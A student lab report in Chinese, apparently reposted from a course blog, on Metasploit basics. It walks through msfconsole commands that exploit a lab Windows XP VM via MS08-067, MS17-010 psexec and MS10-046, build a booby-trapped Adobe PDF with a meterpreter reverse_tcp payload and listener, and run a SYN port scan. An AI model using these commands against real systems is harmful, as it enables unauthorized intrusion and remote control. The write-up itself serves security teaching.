2018-2019 2 20165203 《網絡對抗技術》Exp5 MSF基礎

2018-2019 2 20165203 《網絡對抗技術》Exp5 MSF基礎

實驗內容

本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html

1.1一個主動攻擊實踐,如ms08_067; (1分)shell

1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)windows

1.3 一個針對客戶端的攻擊,如Adobe;(1分)api

1.4 成功應用任何一個輔助模塊。(0.5分)瀏覽器

以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。安全

基礎知識問答

用本身的話解釋什麼是exploit,payload,encode.ruby

用本身感受通俗的話來講:網絡

exploit: msf用來攻擊的一種模塊工具。
payload: 老師上課說的,用來將msf生成的shellcode送到執行攻擊程序的代碼裏去。
encode: 主要功能是編碼,就是假裝攻擊代碼,讓它可以繞過「壞字符」,從而能正常地攻擊靶機,避免出現因「壞字符」而出現問題。session

知識儲備

MSF的六種模塊架構

  • Exploit模塊
    是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而得到對遠程目標系統訪問權的代碼組件。
    其實就是攻擊模塊,即負責攻擊的模塊。
  • Payload模塊
    是在滲透成功後促使目標系統運行的一端植入代碼,一般做用是爲滲透攻擊者打開在目標系統上的控制會話鏈接。實際上,該模塊就是計算機集成的針對不一樣操做系統實現shellcode攻擊的ruby代碼,通俗地來講,就是負責「搬運」shellcode。
  • Encoder模塊
    針對payload進行編碼,能夠經過多種編碼手段、屢次編碼方式有效的改變payload代碼特徵
    不改變payload做用,但能對payload進行加工,使其繞過「壞字符」。
  • Aux模塊
    可以幫助滲透測試中在進行滲透攻擊以前獲得的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。
    主要包括針對各類網絡服務的掃描和查點、構建虛假服務收集登陸密碼、口令猜想破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。
  • Post模塊
    支持在滲透攻擊取得目標系統遠程控制權以後,在受控系統中進行給各樣的後滲透攻擊動做。
    這裏主要指的是攻擊以後可能用到的一些模塊。
  • Nops模塊
    是一些對程序運行狀態不會形成任何實質影響的空操做或無關操做指令,最典型的空指令就是空操做,在X86 CPU體系架構平臺上的操做碼是0x90
    由於有些代碼返回地址很難確認,因此在實際中有時候會填充一大段空指令,便於快速肯定返回地址的位置。

實踐過程

一個主動攻擊實踐

ms08_067_netapi(成功)

攻擊方:Kali(192.168.154.152)
靶機:WindowsXP SP3(English)(192.168.154.153)
Ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊能夠得到一個相對高的權限。
  • 首先,咱們能夠先掃描一下靶機有哪些漏洞,我找到了一篇博客----metaaploit利用漏洞滲透靶機,裏面介紹的很詳細。有兩個指令能夠掃描:nmap -O 靶機IPnmap --script==vuln 靶機IP。咱們能夠都來試一下:

    • 輸入nmap -O 192.168.154.153,如圖所示,呵呵,什麼鬼。

    • 輸入nmap --script==vuln 192.168.154.153,如圖所示,咱們能夠發現有兩個漏洞:ms08_067ms017-010,咱們能夠都試一下。

  • 打開msfconsole,查看一下ms08_067,輸入search ms08_067,咱們能夠看到在攻擊模塊中確實存在這樣一個漏洞exploit/windows/smb/ms08_067_netapi

  • 咱們就利用這個漏洞來進行攻擊,輸入use exploit/windows/smb/ms08_067_netapi

  • 接下來,問題又來了,用什麼攻擊載荷payload來進行攻擊呢?咱們能夠輸入show payloads來查看一下。

  • 咱們能夠看到不少可用的payload,我就選擇一個咱們前幾回實驗沒有用過的generic/meterpreter_reverse_tcp吧,輸入set payload generic/meterpreter_reverse_tcp來設置相關參數。

  • 那麼,問題又來了,有哪些參數須要設置呢?咱們能夠輸入show options來查看。

  • 咱們能夠看到咱們須要設置的有RHOST----被攻擊的靶機IP

  • 咱們就能夠着手開始設置了,輸入set RHOST 192.168.154.153,在這裏,其實其餘的參數就不用設置,只不過一開始作實驗比較保守,就給設置了,嘻嘻。

  • 設置好參數後,輸入exploit開始攻擊。

  • 攻擊成功就會顯示如圖所示畫面。

  • 輸入一個指令dir,就會顯示全部文件了。

ms017_010_psexec(成功且惟一)

接下來咱們嘗試一下ms017_010_psexec

  • 打開msfconsole,輸入search ms017_010搜索一下。

  • 咱們能夠看到這樣的漏洞存在3個,前兩個都有人作過,咱們試一下第3個ms017_010_psexec

  • 輸入use exploit/windows/smb/ms017_010_psexec使用這個漏洞模塊。

  • 接下來,咱們仍是輸入show payloads看看有哪些可用的攻擊載荷。

  • 選擇windows/meterpreter/reverse_tcp,輸入set payloads windows/meterpreter/reverse_tcp,這裏顯示的參數一大堆,不過好多都已經默認了,咱們只須要設置LHOST就好。

  • 輸入set LHOST 192.168.154.152,其餘的不用設置,本身又保守了。

  • 接下來輸入exploit進行攻擊,哇,出現了終端,輸入dir,成功了,開心地蹦起。

一個針對瀏覽器的攻擊

ms10_042(失敗)

攻擊方:Kali(192.168.154.152)
靶機:Windows XP SP3(English)(192.168.154.153)
  • 首先,輸入cd /usr/share/metaploit-framework/modules/exploit/windows/browser查詢看一下有什麼漏洞能夠攻擊,如圖所示,發現一個漏洞ms10_042.

  • 打開msfconsole進行查詢。
  • 輸入search ms10_042,搜索該漏洞。

  • 輸入info exploit/windows/browsers/ms10_042_helpctr_xss_cmd_exec來查詢該漏洞,咱們能夠看到相應靶機。

這裏看到的靶機是自動搜索的。

  • 輸入use exploit/windows/browsers/ms10_042_helpctr_xss_cmd_exec,使用該模塊。
  • 和上面同樣,查詢相應的payloads,我選擇windows/meterpreter/reverse_tcp的攻擊載荷,輸入set payload windows/meterpreter/reverse_tcp,並輸入show options顯示相應參數,發現咱們只須要設置LHOST

  • 輸入exploit進行攻擊,遺憾的是,沒有彈出相應連接入口,攻擊失敗。

ms10_046_shortcut_icon_dllloader(成功且惟一)

攻擊方:Kali(192.168.154.152)
靶機:windows xp sp3(English)(192.168.154.153)
  • 根據剛纔在/usr/share/metaploit-framework/modules/exploit/windows/browser中看到的漏洞,咱們能夠看到還有一個漏洞ms10_046_shortcut_icon_dllloader

  • 仍是剛纔的思路,輸入命令

search ms10_046 //查詢該漏洞的路徑
info exploit/windows/browser/ms10_046_shortcut_icon_dllloader//查詢該漏洞相應的信息
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用該漏洞
show payloads//展現該漏洞相應的攻擊載荷
set payload windows/meterpreter/reverse_tcp//設置相應的攻擊載荷的參數
set LHOST 192.168.154.152
set SRVHOST 192.168.154.152
set RHOST 192.168.154.153
exploit//開始攻擊
  • 出現如圖所示界面,主要是彈出了一個連接入口http://192.168.154.152:80,如圖所示。

  • 在靶機中打開這個連接,彈出兩個文件,打開其中一個文件

  • 打開後,咱們就能夠發現kali已經創建了會話,輸入sessions,咱們就能夠看到創建會話的ID。

  • 輸入sessions -i 1,打開session,成功(長舒一口氣)。

一個針對客戶端的攻擊

攻擊Adobe(成功)

攻擊方:Kali(192.168.154.152)
靶機:windows XP sp3(192.168.154.153)

步驟:

msfconsole//打開msf
search adobe//查找與adobe有關的漏洞
use windows/fileformat/adobe_cooltype_sing //使用攻擊模塊
set payload windows/meterpreter/reverse_tcp//設置攻擊載荷
set LHOST 192.168.154.152
set FILENAME 20165203.pdf//設置生成文件的文件名
exploit//攻擊

  • 如圖所示,顯示文件已生成在root/.msf4/local/下,咱們能夠進入此路徑,找到該文件。

  • 將生成的文件20165203.pdf複製到靶機中。

  • 在Kali中輸入back退出當前模塊,開始監聽
  • 輸入
use exploit/multi/handler//使用監聽模塊
set payload windows/meterpreter/reverse_tcp//設置攻擊載荷
set LHOST 192.168.154.152
exploit//攻擊
  • 在靶機中打開相應的後門文件20165203.pdf

  • 如圖所示,攻擊成功,這個沒有遇到太多困難。

成功應用任何一個輔助模塊

使用auxiliary/scanner/portscan/syn模塊攻擊(成功且惟一)

  • 進入msfconsole後,我用show auxiliary來展現一下輔助模塊,發現了不少掃描端口的模塊。

我也上網搜了一下,這些標識的內容:

ack:經過ACK掃描的方式對防火牆上未被屏蔽的端口進行探測;
ftpbounce:經過FTP BOUNCE攻擊的原理對TCP服務進行枚舉
syn:使用發送TCP SYN標誌的方式探測開放的端口
tcp:經過一次完整的TCP連接來判斷端口是否開放
xmas:一種更爲隱蔽的掃描方式,經過發送FIN,PSH,URG標誌可以躲避一些TCP標記檢測器的過濾
  • 我選擇了auxiliary/scanner/portscan/syn模塊,輸入use auxiliary/scanner/portscan/syn使用這個模塊。
  • 利用show options來查看參數。

  • 輸入
set RHOST 192.168.154.153//設置靶機地址
set THREAD 50//設置線程數
  • 輸入run運行

  • 此時,咱們也能夠在msf中利用nmap的相關指令對主機進行掃描,如圖所示,輸入nmap -sS -Pn 192.168.154.153對靶機進行掃描。

  • 經過觀察不難發現,掃描速度更快,而且對每種端口的做用也有了個說明,能弄清楚每一個端口的做用。

實驗小總結

經過上面的實驗,咱們能夠總結出使用MSF攻擊通常有兩種思路:

  • 肯定靶機。
nmap -O 靶機IP 或 nmap --script==vuln 靶機IP//掃描靶機上的漏洞

msfconsole//打開msf

search 漏洞關鍵字//找出模塊的路徑

開始進行一系列攻擊
  • 不肯定靶機
進入相應文件夾查找漏洞

msfconsole//打開msf

search 漏洞關鍵字//找出模塊的路徑

info 模塊路徑//查詢模塊的信息,尤爲注意target,根據target信息來找相應的靶機

進行一系列攻擊

實驗中遇到的問題及解決方法

基本遇到的問題就是一直在找靶機,找Target對應的版本,遇到了一個小問題,但願對你們有幫助。

Q:在攻擊Adobe時,生成的20165203.pdf文件沒有找到,甚至/root下的msf4/local/也沒有找到。

A:當時本身的反應是文件夾被隱藏了,因而我經過點擊右上的下三角,將顯示隱藏的文件勾上便可。

離實戰還缺什麼步驟

我感受目前咱們對漏洞的分析仍是具備必定的侷限性,僅限於從網上找一些你們攻擊過的漏洞來進行攻擊。要想達到實戰的能力,咱們還應有探索的勇氣,勇於找到一些新的攻擊模塊,本身一步一步查詢相應的靶機,查詢相應的參數來進行設置,因此,仍是須要多多實戰。

實驗感想

經過本次實驗,我對MSF有了更深的理解,原來本身一直分不清msfmetaploitmsfconsolemeterpreter的關係,如今也明白了metaploitmsf的一個版本,msfconsolemsf的一個接口,meterpretermsf的一個工具。 本身也經過實驗總結了使用MSF攻擊的思路和通常步驟,此次實驗真的頗有收穫,可是《網絡對抗》仍是一個實戰性的科目,本身還須要多多實踐。

相關文章
相關標籤/搜索